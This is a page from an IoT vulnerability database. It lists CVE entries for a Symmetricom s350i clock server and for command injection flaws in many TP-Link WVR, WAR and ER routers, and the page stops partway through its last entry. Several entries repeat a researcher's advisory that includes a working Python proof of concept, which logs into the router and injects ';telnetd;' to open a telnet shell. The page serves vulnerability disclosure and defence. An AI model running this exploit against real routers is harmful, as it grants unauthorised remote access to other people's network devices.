VARIoT IoT vulnerabilities database
| VAR-201801-0077 | CVE-2014-5068 | Symmetricom s350i Path traversal vulnerability |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
Directory traversal vulnerability in the web application in Symmetricom s350i 2.70.15 allows remote attackers to read arbitrary files via a (1) ../ (dot dot slash) or (2) ..\ (dot dot forward slash) before a file name. Symmetricom s350i Contains a path traversal vulnerability.Information may be obtained. Microsemi Symmetricom s350i is a clock server of American Microsemi Company. web application is one of the web applications. A directory traversal vulnerability exists in web applications in Microsemi Symmetricom s350i version 2.70.15
| VAR-201801-0079 | CVE-2014-5070 | Symmetricom s350i Vulnerabilities related to authorization, permissions, and access control |
CVSS V2: 6.5 CVSS V3: 8.8 Severity: HIGH |
Symmetricom s350i 2.70.15 allows remote authenticated users to gain privileges via vectors related to pushing unauthenticated users to the login page. Symmetricom s350i Contains vulnerabilities related to authorization, permissions, and access control.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Microsemi Symmetricom s350i is a clock server of American Microsemi Company. A security vulnerability exists in Microsemi Symmetricom s350i version 2.70.15. A remote attacker could exploit this vulnerability to gain privileges
| VAR-201801-0395 | CVE-2017-15614 | plural TP-Link Command injection vulnerability in devices |
CVSS V2: 9.0 CVSS V3: 7.2 Severity: HIGH |
TP-Link WVR, WAR and ER devices allow remote authenticated administrators to execute arbitrary commands via command injection in the new-outif variable in the pptp_client.lua file. TP-Link WVR , WAR ,and ER The device contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. TP-LinkWVR, WAR and ERdevices are different series of router products from China TP-LINK. Security vulnerabilities exist in TP-LinkWVR, WAR, and ER devices.
These vulnerabilities can be triggered in LAN and WAN(if the "remote management" function is enabled).
Vulnerability Type:
================
Command Injection (Authenticated)
Product:
================
We has tested these vulnerabilities on TL-WVR450L(the latest version is TL-WVR450L V1.0161125) and TL-WVR900G(TL-WVR900G V3.0_170306).
And the following model should also be affected and the vendor has confirmed:
TP-Link ER5110G,
TP-Link ER5120G,
TP-Link ER5510G,
TP-Link ER5520G,
TP-Link R4149G,
TP-Link R4239G,
TP-Link R4299G,
TP-Link R473GP-AC,
TP-Link R473G,
TP-Link R473P-AC,
TP-Link R473,
TP-Link R478G+,
TP-Link R478,
TP-Link R478+,
TP-Link R483G,
TP-Link R483,
TP-Link R488,
TP-Link WAR1300L,
TP-Link WAR1750L,
TP-Link WAR2600L,
TP-Link WAR302,
TP-Link WAR450L,
TP-Link WAR450,
TP-Link WAR458L,
TP-Link WAR458,
TP-Link WAR900L,
TP-Link WVR1300G,
TP-Link WVR1300L,
TP-Link WVR1750L,
TP-Link WVR2600L,
TP-Link WVR300,
TP-Link WVR302,
TP-Link WVR4300L,
TP-Link WVR450L,
TP-Link WVR450,
TP-Link WVR458L,
TP-Link WVR900G,
TP-Link WVR900L
CVE details:
================
The detail of each vulnerability are as follows:
CVE-2017-15613: new-interface variable in the cmxddns.lua file
CVE-2017-15614: new-outif variable in the pptp_client.lua file
CVE-2017-15615: lcpechointerval variable in the pptp_client.lua file
CVE-2017-15616: new-interface variable in the phddns.lua file
CVE-2017-15617: iface variable in the interface_wan.lua file
CVE-2017-15618: new-enable variable in the pptp_client.lua file
CVE-2017-15619: pptphellointerval variable in the pptp_client.lua file
CVE-2017-15620: new-zone variable in the ipmac_import.lua file
CVE-2017-15621: olmode variable in the interface_wan.lua file
CVE-2017-15622: new-mppeencryption variable in the pptp_client.lua file
CVE-2017-15623: new-enable variable in the pptp_server.lua file
CVE-2017-15624: new-authtype variable in the pptp_server.lua file
CVE-2017-15625: new-olmode variable in the pptp_client.lua file
CVE-2017-15626: new-bindif variable in the pptp_server.lua file
CVE-2017-15627: new-pns variable in the pptp_client.lua file
CVE-2017-15628: lcpechointerval variable in the pptp_server.lua file
CVE-2017-15629: new-tunnelname variable in the pptp_client.lua file
CVE-2017-15630: new-remotesubnet variable in the pptp_client.lua file
CVE-2017-15631: new-workmode variable in the pptp_client.lua file
CVE-2017-15632: new-mppeencryption variable in the pptp_server.lua file
CVE-2017-15633: new-ipgroup variable in the session_limits.lua file
CVE-2017-15634: name variable in the wportal.lua file
CVE-2017-15635: max_conn variable in the session_limits.lua file
CVE-2017-15636: new-time variable in the webfilter.lua file
CVE-2017-15637: pptphellointerval variable in the pptp_server.lua file
Credits:
================
chunibalon, puzzor @VARAS of IIE
Timeline:
================
2017.08 to 2017.09: Issues found.
2017.09.26: Vendor contacted.
2017.10.13: Vendor confirmed.
2017.10.14: CVE id requested.
2017.10.19: CVE id assigned.
2018.1: Vendor confirmed that all effected products have been fixed.
Vulnerability detail:
================
These vulnerability are caused by the similar reason, so here is an explanation of CVE-2017-15616.
Other vulnerabilities can be reproduced with the detail descriptions of the variable and lua file.
In /usr/lib/lua/luci/controller/admin/phddns.lua file, line 113:
***********************************
function add_phddns(http_form)
local form_data = json.decode(http_form.data)
local jdata = form_data.params.new
ret = form:insert(CONFIG_NAME, "phddns", jdata, RULE_KEYS, nil)
if not ret then
return false, err.ERR_COM_TABLE_ITEM_UCI_ADD
end
if not uci_r:commit(CONFIG_NAME) then
return false, err.ERR_COM_UCI_COMMIT
end
-- add the ref of interface
ifs.update_if_reference(jdata.interface, 1)
sys.fork_exec('/etc/init.d/phddns restart')
userconfig.cfg_modify()
return jdata
end
***********************************
This file will process a POST request from the web management panel with url "ip/cgi-bin/luci/;stok=xxx/admin/phddns?form=phddns".
The interface argument passed by the POST request can be set with the malformed command payload and the lua file didn't check the argument sufficiently.
Then the malformed value of "interface" argument causes the command injection vulnerability.
PoC file:
================
***********************************
import requests
import urllib
import json
# This is the PoC code of authenticated command injection of TP-Link WVR900G router with the CVE-2017-15616.
# To reproduce the PoC, the ip of the router should be 192.168.123.1 and the password of web management panel should be 'adminadmin'
PASSWORD = 'c6564879eda92681404fb4ce64343788e47d266c490bb9d574f4467644a2f96b73ec157bbffabb50752c46f55d026ec7ef34661d7dcb030b0b1fa527173093ae4358f4740e539322f58c441ea0003978475346fb66320f749cc138f867bc0d8d9501f1613524fbba565979d95df6ef412837dee15a6dd8867d00b91c6f4a3406'
BASEURL = 'http://192.168.123.1'
LOGINURL = BASEURL + '/cgi-bin/luci/;stok=/login?form=login'
MARK = '###'
VULURL = BASEURL + '/cgi-bin/luci/;stok=%s/admin/phddns?form=phddns' % (MARK)
headers = {
"Accept": "application/json, text/javascript, */*; q=0.01",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4",
"Connection": "keep-alive",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"Host": BASEURL[7:],
"Origin": BASEURL,
"Referer": "%s/webpages/login.html" % (BASEURL),
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36",
"X-Requested-With": "XMLHttpRequest"
}
login_data_value = {'method': 'login','params': {'password': PASSWORD,'username': 'admin'}}
login_data = {'data':json.dumps(login_data_value)}
s = requests.Session()
s.headers.update(headers)
print (LOGINURL)
print (login_data)
res = s.post(LOGINURL, data=login_data)
stok = eval(res.text)['result']['stok']
print '[*] stok is %s' % (stok)
tmp_vul = VULURL.replace(MARK, stok)
print '[*] vul_url is %s ' % (tmp_vul)
delete_data = {"method":"delete","params":{"key":"key-0","index":"0"}}
delete_data = {'data': json.dumps(delete_data)}
print '[+] delete existed rule'
res = s.post(tmp_vul, data=delete_data)
print '[*] response is: %s' % (res.text)
# after executing this payload, the router will open its telnetd service.
payload = ''';telnetd;'''
vul_data = {"method":"add","params":{"index":0,"old":"add","new":{"interface":"WAN1%s" % (payload),"name":"test1","passwd":"test","enable":"on"},"key":"add"}}
vul_data = {'data': json.dumps(vul_data)}
print '[+] sending payload'
res = s.post(tmp_vul, data=vul_data)
print '[*] response is: %s' % (res.text)
***********************************
Reference:
================
https://github.com/chunibalon/Vulnerability/blob/master/CVE-2017-15613_to_CVE-2017-15637.txt
| VAR-201801-0396 | CVE-2017-15615 | plural TP-Link Command injection vulnerability in devices |
CVSS V2: 9.0 CVSS V3: 7.2 Severity: HIGH |
TP-Link WVR, WAR and ER devices allow remote authenticated administrators to execute arbitrary commands via command injection in the lcpechointerval variable in the pptp_client.lua file. TP-Link WVR , WAR ,and ER The device contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. TP-LinkWVR, WAR and ERdevices are different series of router products from China TP-LINK. Security vulnerabilities exist in TP-LinkWVR, WAR, and ER devices.
These vulnerabilities can be triggered in LAN and WAN(if the "remote management" function is enabled).
Vulnerability Type:
================
Command Injection (Authenticated)
Product:
================
We has tested these vulnerabilities on TL-WVR450L(the latest version is TL-WVR450L V1.0161125) and TL-WVR900G(TL-WVR900G V3.0_170306).
And the following model should also be affected and the vendor has confirmed:
TP-Link ER5110G,
TP-Link ER5120G,
TP-Link ER5510G,
TP-Link ER5520G,
TP-Link R4149G,
TP-Link R4239G,
TP-Link R4299G,
TP-Link R473GP-AC,
TP-Link R473G,
TP-Link R473P-AC,
TP-Link R473,
TP-Link R478G+,
TP-Link R478,
TP-Link R478+,
TP-Link R483G,
TP-Link R483,
TP-Link R488,
TP-Link WAR1300L,
TP-Link WAR1750L,
TP-Link WAR2600L,
TP-Link WAR302,
TP-Link WAR450L,
TP-Link WAR450,
TP-Link WAR458L,
TP-Link WAR458,
TP-Link WAR900L,
TP-Link WVR1300G,
TP-Link WVR1300L,
TP-Link WVR1750L,
TP-Link WVR2600L,
TP-Link WVR300,
TP-Link WVR302,
TP-Link WVR4300L,
TP-Link WVR450L,
TP-Link WVR450,
TP-Link WVR458L,
TP-Link WVR900G,
TP-Link WVR900L
CVE details:
================
The detail of each vulnerability are as follows:
CVE-2017-15613: new-interface variable in the cmxddns.lua file
CVE-2017-15614: new-outif variable in the pptp_client.lua file
CVE-2017-15615: lcpechointerval variable in the pptp_client.lua file
CVE-2017-15616: new-interface variable in the phddns.lua file
CVE-2017-15617: iface variable in the interface_wan.lua file
CVE-2017-15618: new-enable variable in the pptp_client.lua file
CVE-2017-15619: pptphellointerval variable in the pptp_client.lua file
CVE-2017-15620: new-zone variable in the ipmac_import.lua file
CVE-2017-15621: olmode variable in the interface_wan.lua file
CVE-2017-15622: new-mppeencryption variable in the pptp_client.lua file
CVE-2017-15623: new-enable variable in the pptp_server.lua file
CVE-2017-15624: new-authtype variable in the pptp_server.lua file
CVE-2017-15625: new-olmode variable in the pptp_client.lua file
CVE-2017-15626: new-bindif variable in the pptp_server.lua file
CVE-2017-15627: new-pns variable in the pptp_client.lua file
CVE-2017-15628: lcpechointerval variable in the pptp_server.lua file
CVE-2017-15629: new-tunnelname variable in the pptp_client.lua file
CVE-2017-15630: new-remotesubnet variable in the pptp_client.lua file
CVE-2017-15631: new-workmode variable in the pptp_client.lua file
CVE-2017-15632: new-mppeencryption variable in the pptp_server.lua file
CVE-2017-15633: new-ipgroup variable in the session_limits.lua file
CVE-2017-15634: name variable in the wportal.lua file
CVE-2017-15635: max_conn variable in the session_limits.lua file
CVE-2017-15636: new-time variable in the webfilter.lua file
CVE-2017-15637: pptphellointerval variable in the pptp_server.lua file
Credits:
================
chunibalon, puzzor @VARAS of IIE
Timeline:
================
2017.08 to 2017.09: Issues found.
2017.09.26: Vendor contacted.
2017.10.13: Vendor confirmed.
2017.10.14: CVE id requested.
2017.10.19: CVE id assigned.
2018.1: Vendor confirmed that all effected products have been fixed.
Vulnerability detail:
================
These vulnerability are caused by the similar reason, so here is an explanation of CVE-2017-15616.
Other vulnerabilities can be reproduced with the detail descriptions of the variable and lua file.
In /usr/lib/lua/luci/controller/admin/phddns.lua file, line 113:
***********************************
function add_phddns(http_form)
local form_data = json.decode(http_form.data)
local jdata = form_data.params.new
ret = form:insert(CONFIG_NAME, "phddns", jdata, RULE_KEYS, nil)
if not ret then
return false, err.ERR_COM_TABLE_ITEM_UCI_ADD
end
if not uci_r:commit(CONFIG_NAME) then
return false, err.ERR_COM_UCI_COMMIT
end
-- add the ref of interface
ifs.update_if_reference(jdata.interface, 1)
sys.fork_exec('/etc/init.d/phddns restart')
userconfig.cfg_modify()
return jdata
end
***********************************
This file will process a POST request from the web management panel with url "ip/cgi-bin/luci/;stok=xxx/admin/phddns?form=phddns".
The interface argument passed by the POST request can be set with the malformed command payload and the lua file didn't check the argument sufficiently.
Then the malformed value of "interface" argument causes the command injection vulnerability.
PoC file:
================
***********************************
import requests
import urllib
import json
# This is the PoC code of authenticated command injection of TP-Link WVR900G router with the CVE-2017-15616.
# To reproduce the PoC, the ip of the router should be 192.168.123.1 and the password of web management panel should be 'adminadmin'
PASSWORD = 'c6564879eda92681404fb4ce64343788e47d266c490bb9d574f4467644a2f96b73ec157bbffabb50752c46f55d026ec7ef34661d7dcb030b0b1fa527173093ae4358f4740e539322f58c441ea0003978475346fb66320f749cc138f867bc0d8d9501f1613524fbba565979d95df6ef412837dee15a6dd8867d00b91c6f4a3406'
BASEURL = 'http://192.168.123.1'
LOGINURL = BASEURL + '/cgi-bin/luci/;stok=/login?form=login'
MARK = '###'
VULURL = BASEURL + '/cgi-bin/luci/;stok=%s/admin/phddns?form=phddns' % (MARK)
headers = {
"Accept": "application/json, text/javascript, */*; q=0.01",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4",
"Connection": "keep-alive",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"Host": BASEURL[7:],
"Origin": BASEURL,
"Referer": "%s/webpages/login.html" % (BASEURL),
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36",
"X-Requested-With": "XMLHttpRequest"
}
login_data_value = {'method': 'login','params': {'password': PASSWORD,'username': 'admin'}}
login_data = {'data':json.dumps(login_data_value)}
s = requests.Session()
s.headers.update(headers)
print (LOGINURL)
print (login_data)
res = s.post(LOGINURL, data=login_data)
stok = eval(res.text)['result']['stok']
print '[*] stok is %s' % (stok)
tmp_vul = VULURL.replace(MARK, stok)
print '[*] vul_url is %s ' % (tmp_vul)
delete_data = {"method":"delete","params":{"key":"key-0","index":"0"}}
delete_data = {'data': json.dumps(delete_data)}
print '[+] delete existed rule'
res = s.post(tmp_vul, data=delete_data)
print '[*] response is: %s' % (res.text)
# after executing this payload, the router will open its telnetd service.
payload = ''';telnetd;'''
vul_data = {"method":"add","params":{"index":0,"old":"add","new":{"interface":"WAN1%s" % (payload),"name":"test1","passwd":"test","enable":"on"},"key":"add"}}
vul_data = {'data': json.dumps(vul_data)}
print '[+] sending payload'
res = s.post(tmp_vul, data=vul_data)
print '[*] response is: %s' % (res.text)
***********************************
Reference:
================
https://github.com/chunibalon/Vulnerability/blob/master/CVE-2017-15613_to_CVE-2017-15637.txt
| VAR-201801-0397 | CVE-2017-15616 | plural TP-Link Command injection vulnerability in devices |
CVSS V2: 9.0 CVSS V3: 7.2 Severity: HIGH |
TP-Link WVR, WAR and ER devices allow remote authenticated administrators to execute arbitrary commands via command injection in the new-interface variable in the phddns.lua file. TP-Link WVR , WAR ,and ER The device contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. TP-LinkWVR, WAR and ERdevices are different series of router products from China TP-LINK. Security vulnerabilities exist in TP-LinkWVR, WAR, and ER devices.
These vulnerabilities can be triggered in LAN and WAN(if the "remote management" function is enabled).
Vulnerability Type:
================
Command Injection (Authenticated)
Product:
================
We has tested these vulnerabilities on TL-WVR450L(the latest version is TL-WVR450L V1.0161125) and TL-WVR900G(TL-WVR900G V3.0_170306).
And the following model should also be affected and the vendor has confirmed:
TP-Link ER5110G,
TP-Link ER5120G,
TP-Link ER5510G,
TP-Link ER5520G,
TP-Link R4149G,
TP-Link R4239G,
TP-Link R4299G,
TP-Link R473GP-AC,
TP-Link R473G,
TP-Link R473P-AC,
TP-Link R473,
TP-Link R478G+,
TP-Link R478,
TP-Link R478+,
TP-Link R483G,
TP-Link R483,
TP-Link R488,
TP-Link WAR1300L,
TP-Link WAR1750L,
TP-Link WAR2600L,
TP-Link WAR302,
TP-Link WAR450L,
TP-Link WAR450,
TP-Link WAR458L,
TP-Link WAR458,
TP-Link WAR900L,
TP-Link WVR1300G,
TP-Link WVR1300L,
TP-Link WVR1750L,
TP-Link WVR2600L,
TP-Link WVR300,
TP-Link WVR302,
TP-Link WVR4300L,
TP-Link WVR450L,
TP-Link WVR450,
TP-Link WVR458L,
TP-Link WVR900G,
TP-Link WVR900L
CVE details:
================
The detail of each vulnerability are as follows:
CVE-2017-15613: new-interface variable in the cmxddns.lua file
CVE-2017-15614: new-outif variable in the pptp_client.lua file
CVE-2017-15615: lcpechointerval variable in the pptp_client.lua file
CVE-2017-15616: new-interface variable in the phddns.lua file
CVE-2017-15617: iface variable in the interface_wan.lua file
CVE-2017-15618: new-enable variable in the pptp_client.lua file
CVE-2017-15619: pptphellointerval variable in the pptp_client.lua file
CVE-2017-15620: new-zone variable in the ipmac_import.lua file
CVE-2017-15621: olmode variable in the interface_wan.lua file
CVE-2017-15622: new-mppeencryption variable in the pptp_client.lua file
CVE-2017-15623: new-enable variable in the pptp_server.lua file
CVE-2017-15624: new-authtype variable in the pptp_server.lua file
CVE-2017-15625: new-olmode variable in the pptp_client.lua file
CVE-2017-15626: new-bindif variable in the pptp_server.lua file
CVE-2017-15627: new-pns variable in the pptp_client.lua file
CVE-2017-15628: lcpechointerval variable in the pptp_server.lua file
CVE-2017-15629: new-tunnelname variable in the pptp_client.lua file
CVE-2017-15630: new-remotesubnet variable in the pptp_client.lua file
CVE-2017-15631: new-workmode variable in the pptp_client.lua file
CVE-2017-15632: new-mppeencryption variable in the pptp_server.lua file
CVE-2017-15633: new-ipgroup variable in the session_limits.lua file
CVE-2017-15634: name variable in the wportal.lua file
CVE-2017-15635: max_conn variable in the session_limits.lua file
CVE-2017-15636: new-time variable in the webfilter.lua file
CVE-2017-15637: pptphellointerval variable in the pptp_server.lua file
Credits:
================
chunibalon, puzzor @VARAS of IIE
Timeline:
================
2017.08 to 2017.09: Issues found.
2017.09.26: Vendor contacted.
2017.10.13: Vendor confirmed.
2017.10.14: CVE id requested.
2017.10.19: CVE id assigned.
2018.1: Vendor confirmed that all effected products have been fixed.
Vulnerability detail:
================
These vulnerability are caused by the similar reason, so here is an explanation of CVE-2017-15616.
Other vulnerabilities can be reproduced with the detail descriptions of the variable and lua file.
In /usr/lib/lua/luci/controller/admin/phddns.lua file, line 113:
***********************************
function add_phddns(http_form)
local form_data = json.decode(http_form.data)
local jdata = form_data.params.new
ret = form:insert(CONFIG_NAME, "phddns", jdata, RULE_KEYS, nil)
if not ret then
return false, err.ERR_COM_TABLE_ITEM_UCI_ADD
end
if not uci_r:commit(CONFIG_NAME) then
return false, err.ERR_COM_UCI_COMMIT
end
-- add the ref of interface
ifs.update_if_reference(jdata.interface, 1)
sys.fork_exec('/etc/init.d/phddns restart')
userconfig.cfg_modify()
return jdata
end
***********************************
This file will process a POST request from the web management panel with url "ip/cgi-bin/luci/;stok=xxx/admin/phddns?form=phddns".
The interface argument passed by the POST request can be set with the malformed command payload and the lua file didn't check the argument sufficiently.
Then the malformed value of "interface" argument causes the command injection vulnerability.
PoC file:
================
***********************************
import requests
import urllib
import json
# This is the PoC code of authenticated command injection of TP-Link WVR900G router with the CVE-2017-15616.
# To reproduce the PoC, the ip of the router should be 192.168.123.1 and the password of web management panel should be 'adminadmin'
PASSWORD = 'c6564879eda92681404fb4ce64343788e47d266c490bb9d574f4467644a2f96b73ec157bbffabb50752c46f55d026ec7ef34661d7dcb030b0b1fa527173093ae4358f4740e539322f58c441ea0003978475346fb66320f749cc138f867bc0d8d9501f1613524fbba565979d95df6ef412837dee15a6dd8867d00b91c6f4a3406'
BASEURL = 'http://192.168.123.1'
LOGINURL = BASEURL + '/cgi-bin/luci/;stok=/login?form=login'
MARK = '###'
VULURL = BASEURL + '/cgi-bin/luci/;stok=%s/admin/phddns?form=phddns' % (MARK)
headers = {
"Accept": "application/json, text/javascript, */*; q=0.01",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4",
"Connection": "keep-alive",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"Host": BASEURL[7:],
"Origin": BASEURL,
"Referer": "%s/webpages/login.html" % (BASEURL),
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36",
"X-Requested-With": "XMLHttpRequest"
}
login_data_value = {'method': 'login','params': {'password': PASSWORD,'username': 'admin'}}
login_data = {'data':json.dumps(login_data_value)}
s = requests.Session()
s.headers.update(headers)
print (LOGINURL)
print (login_data)
res = s.post(LOGINURL, data=login_data)
stok = eval(res.text)['result']['stok']
print '[*] stok is %s' % (stok)
tmp_vul = VULURL.replace(MARK, stok)
print '[*] vul_url is %s ' % (tmp_vul)
delete_data = {"method":"delete","params":{"key":"key-0","index":"0"}}
delete_data = {'data': json.dumps(delete_data)}
print '[+] delete existed rule'
res = s.post(tmp_vul, data=delete_data)
print '[*] response is: %s' % (res.text)
# after executing this payload, the router will open its telnetd service.
payload = ''';telnetd;'''
vul_data = {"method":"add","params":{"index":0,"old":"add","new":{"interface":"WAN1%s" % (payload),"name":"test1","passwd":"test","enable":"on"},"key":"add"}}
vul_data = {'data': json.dumps(vul_data)}
print '[+] sending payload'
res = s.post(tmp_vul, data=vul_data)
print '[*] response is: %s' % (res.text)
***********************************
Reference:
================
https://github.com/chunibalon/Vulnerability/blob/master/CVE-2017-15613_to_CVE-2017-15637.txt
| VAR-201801-0469 | CVE-2017-15617 | plural TP-Link Command injection vulnerability in devices |
CVSS V2: 9.0 CVSS V3: 7.2 Severity: HIGH |
TP-Link WVR, WAR and ER devices allow remote authenticated administrators to execute arbitrary commands via command injection in the iface variable in the interface_wan.lua file. TP-Link WVR , WAR ,and ER The device contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. TP-LinkWVR, WAR and ERdevices are different series of router products from China TP-LINK. Security vulnerabilities exist in TP-LinkWVR, WAR, and ER devices.
These vulnerabilities can be triggered in LAN and WAN(if the "remote management" function is enabled).
Vulnerability Type:
================
Command Injection (Authenticated)
Product:
================
We has tested these vulnerabilities on TL-WVR450L(the latest version is TL-WVR450L V1.0161125) and TL-WVR900G(TL-WVR900G V3.0_170306).
And the following model should also be affected and the vendor has confirmed:
TP-Link ER5110G,
TP-Link ER5120G,
TP-Link ER5510G,
TP-Link ER5520G,
TP-Link R4149G,
TP-Link R4239G,
TP-Link R4299G,
TP-Link R473GP-AC,
TP-Link R473G,
TP-Link R473P-AC,
TP-Link R473,
TP-Link R478G+,
TP-Link R478,
TP-Link R478+,
TP-Link R483G,
TP-Link R483,
TP-Link R488,
TP-Link WAR1300L,
TP-Link WAR1750L,
TP-Link WAR2600L,
TP-Link WAR302,
TP-Link WAR450L,
TP-Link WAR450,
TP-Link WAR458L,
TP-Link WAR458,
TP-Link WAR900L,
TP-Link WVR1300G,
TP-Link WVR1300L,
TP-Link WVR1750L,
TP-Link WVR2600L,
TP-Link WVR300,
TP-Link WVR302,
TP-Link WVR4300L,
TP-Link WVR450L,
TP-Link WVR450,
TP-Link WVR458L,
TP-Link WVR900G,
TP-Link WVR900L
CVE details:
================
The detail of each vulnerability are as follows:
CVE-2017-15613: new-interface variable in the cmxddns.lua file
CVE-2017-15614: new-outif variable in the pptp_client.lua file
CVE-2017-15615: lcpechointerval variable in the pptp_client.lua file
CVE-2017-15616: new-interface variable in the phddns.lua file
CVE-2017-15617: iface variable in the interface_wan.lua file
CVE-2017-15618: new-enable variable in the pptp_client.lua file
CVE-2017-15619: pptphellointerval variable in the pptp_client.lua file
CVE-2017-15620: new-zone variable in the ipmac_import.lua file
CVE-2017-15621: olmode variable in the interface_wan.lua file
CVE-2017-15622: new-mppeencryption variable in the pptp_client.lua file
CVE-2017-15623: new-enable variable in the pptp_server.lua file
CVE-2017-15624: new-authtype variable in the pptp_server.lua file
CVE-2017-15625: new-olmode variable in the pptp_client.lua file
CVE-2017-15626: new-bindif variable in the pptp_server.lua file
CVE-2017-15627: new-pns variable in the pptp_client.lua file
CVE-2017-15628: lcpechointerval variable in the pptp_server.lua file
CVE-2017-15629: new-tunnelname variable in the pptp_client.lua file
CVE-2017-15630: new-remotesubnet variable in the pptp_client.lua file
CVE-2017-15631: new-workmode variable in the pptp_client.lua file
CVE-2017-15632: new-mppeencryption variable in the pptp_server.lua file
CVE-2017-15633: new-ipgroup variable in the session_limits.lua file
CVE-2017-15634: name variable in the wportal.lua file
CVE-2017-15635: max_conn variable in the session_limits.lua file
CVE-2017-15636: new-time variable in the webfilter.lua file
CVE-2017-15637: pptphellointerval variable in the pptp_server.lua file
Credits:
================
chunibalon, puzzor @VARAS of IIE
Timeline:
================
2017.08 to 2017.09: Issues found.
2017.09.26: Vendor contacted.
2017.10.13: Vendor confirmed.
2017.10.14: CVE id requested.
2017.10.19: CVE id assigned.
2018.1: Vendor confirmed that all effected products have been fixed.
Vulnerability detail:
================
These vulnerability are caused by the similar reason, so here is an explanation of CVE-2017-15616.
Other vulnerabilities can be reproduced with the detail descriptions of the variable and lua file.
In /usr/lib/lua/luci/controller/admin/phddns.lua file, line 113:
***********************************
function add_phddns(http_form)
local form_data = json.decode(http_form.data)
local jdata = form_data.params.new
ret = form:insert(CONFIG_NAME, "phddns", jdata, RULE_KEYS, nil)
if not ret then
return false, err.ERR_COM_TABLE_ITEM_UCI_ADD
end
if not uci_r:commit(CONFIG_NAME) then
return false, err.ERR_COM_UCI_COMMIT
end
-- add the ref of interface
ifs.update_if_reference(jdata.interface, 1)
sys.fork_exec('/etc/init.d/phddns restart')
userconfig.cfg_modify()
return jdata
end
***********************************
This file will process a POST request from the web management panel with url "ip/cgi-bin/luci/;stok=xxx/admin/phddns?form=phddns".
The interface argument passed by the POST request can be set with the malformed command payload and the lua file didn't check the argument sufficiently.
Then the malformed value of "interface" argument causes the command injection vulnerability.
PoC file:
================
***********************************
import requests
import urllib
import json
# This is the PoC code of authenticated command injection of TP-Link WVR900G router with the CVE-2017-15616.
# To reproduce the PoC, the ip of the router should be 192.168.123.1 and the password of web management panel should be 'adminadmin'
PASSWORD = 'c6564879eda92681404fb4ce64343788e47d266c490bb9d574f4467644a2f96b73ec157bbffabb50752c46f55d026ec7ef34661d7dcb030b0b1fa527173093ae4358f4740e539322f58c441ea0003978475346fb66320f749cc138f867bc0d8d9501f1613524fbba565979d95df6ef412837dee15a6dd8867d00b91c6f4a3406'
BASEURL = 'http://192.168.123.1'
LOGINURL = BASEURL + '/cgi-bin/luci/;stok=/login?form=login'
MARK = '###'
VULURL = BASEURL + '/cgi-bin/luci/;stok=%s/admin/phddns?form=phddns' % (MARK)
headers = {
"Accept": "application/json, text/javascript, */*; q=0.01",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4",
"Connection": "keep-alive",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"Host": BASEURL[7:],
"Origin": BASEURL,
"Referer": "%s/webpages/login.html" % (BASEURL),
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36",
"X-Requested-With": "XMLHttpRequest"
}
login_data_value = {'method': 'login','params': {'password': PASSWORD,'username': 'admin'}}
login_data = {'data':json.dumps(login_data_value)}
s = requests.Session()
s.headers.update(headers)
print (LOGINURL)
print (login_data)
res = s.post(LOGINURL, data=login_data)
stok = eval(res.text)['result']['stok']
print '[*] stok is %s' % (stok)
tmp_vul = VULURL.replace(MARK, stok)
print '[*] vul_url is %s ' % (tmp_vul)
delete_data = {"method":"delete","params":{"key":"key-0","index":"0"}}
delete_data = {'data': json.dumps(delete_data)}
print '[+] delete existed rule'
res = s.post(tmp_vul, data=delete_data)
print '[*] response is: %s' % (res.text)
# after executing this payload, the router will open its telnetd service.
payload = ''';telnetd;'''
vul_data = {"method":"add","params":{"index":0,"old":"add","new":{"interface":"WAN1%s" % (payload),"name":"test1","passwd":"test","enable":"on"},"key":"add"}}
vul_data = {'data': json.dumps(vul_data)}
print '[+] sending payload'
res = s.post(tmp_vul, data=vul_data)
print '[*] response is: %s' % (res.text)
***********************************
Reference:
================
https://github.com/chunibalon/Vulnerability/blob/master/CVE-2017-15613_to_CVE-2017-15637.txt
| VAR-201801-0470 | CVE-2017-15618 | plural TP-Link Command injection vulnerability in devices |
CVSS V2: 9.0 CVSS V3: 7.2 Severity: HIGH |
TP-Link WVR, WAR and ER devices allow remote authenticated administrators to execute arbitrary commands via command injection in the new-enable variable in the pptp_client.lua file. TP-Link WVR , WAR ,and ER The device contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. TP-LinkWVR, WAR and ERdevices are different series of router products from China TP-LINK. Security vulnerabilities exist in TP-LinkWVR, WAR, and ER devices.
These vulnerabilities can be triggered in LAN and WAN(if the "remote management" function is enabled).
Vulnerability Type:
================
Command Injection (Authenticated)
Product:
================
We has tested these vulnerabilities on TL-WVR450L(the latest version is TL-WVR450L V1.0161125) and TL-WVR900G(TL-WVR900G V3.0_170306).
And the following model should also be affected and the vendor has confirmed:
TP-Link ER5110G,
TP-Link ER5120G,
